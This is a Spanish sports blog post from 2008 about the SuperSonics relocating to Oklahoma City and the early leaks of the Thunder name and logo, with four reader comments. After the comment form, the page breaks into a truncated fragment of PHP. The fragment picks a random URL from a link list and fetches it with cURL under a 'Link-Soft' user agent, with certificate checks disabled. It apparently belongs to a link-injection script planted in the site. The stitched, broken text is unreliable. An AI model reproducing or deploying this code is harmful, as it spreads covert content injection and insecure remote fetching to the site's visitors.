El secreto peor guardado

05 de September de 2008 por txusma

Después de muchas semanas de rumores, desmentidos y conversaciones finalmente el 3 de Julio los Supersonics abandonaban la que había sido su ciudad durante tantos años para trasladarse a Oklahoma City,  que ya demostró cuando alojó temporalmente a los Hornets que era una ciudad. El propietario de la franquicia,  Clay Bennett, llegó a un acuerdo con los dirigentes de la ciudad para trasladarla a cambio del pago de 45 millones de dólares y de que el nuevo equipo cambiara de colores y de nombre, de manera que el recuerdo de los Supersonics se quedara para siempre en Seattle, en espera de una posible resurrección futura.

Y desde ese mismo día se dispararon las especulaciones sobre el nuevo nombre, especulaciones que duraron más bien poco porque el 19 de Julio se descubrió que empresas afines al equipo habían registrado diversos dominios como okcthunderbasketball.com o okcbaronsbasketball.com y tan solo un día más tarde los períodicos, citando a un supuesto propietario, ya aventuraban que el nombre oficial sería el de Oklahoma City Thunder (nombre que haría referencia a la tempestuosa metereología de la zona).

En todo caso, la presentación oficial de la nueva denominación de la franquicia y del nuevo logo estaba programada para el miércoles, 3 de septiembre y los propietarios al menos esperaban que, ya que el nombre había sido filtrado mucho tiempo atrás, el diseño del logo fuera secreto hasta el último momento. Pero tampoco lo consiguieron. Tan solo 5 días antes de la fecha señalada empezó a correr por internet una imagen captada por un trabajador de la franquicia que, desempaquetando diferentes productos de merchandising , no pudo dejar la cámara digital quieta. El misterio había sido totalmente desvalado y la presentación sirvió solamente de confirmación de un secreto a voces.

Comenta

4 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Esta franquicia… no sé porqué será
    pero apesta

      Citar

  2. MagicJohnson32 dice:
    #2

    Hombre, muy buena pinta no tiene, pero si los Grizzlies sobrevivieron a Vancouver…

      Citar

  3. txusma dice:
    #3

    Hombre, puede apestar el nombre, los colores, el logo pero no tendreis quejas de la ciudad no? Creo q la respuesta cuando se trasladaron temporalmente los Hornets fue excelente.

      Citar

  4. TheDeerHunter dice:
    #4

    Lo que pasa es que en este caso el origen del equipo significa la desaparición de otro… con mucha solera para colmo. Es inevitable que hayan generado algo de animadversión… pero la ciudad en si ya sabemos que no tiene la culpa

    Supongo que será un sentimiento pasajero… pero como decís, de momento apesta el nombre, los colores, el logo. el equipo… y ya veremos el uniforme pero no auguro nada bueno.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>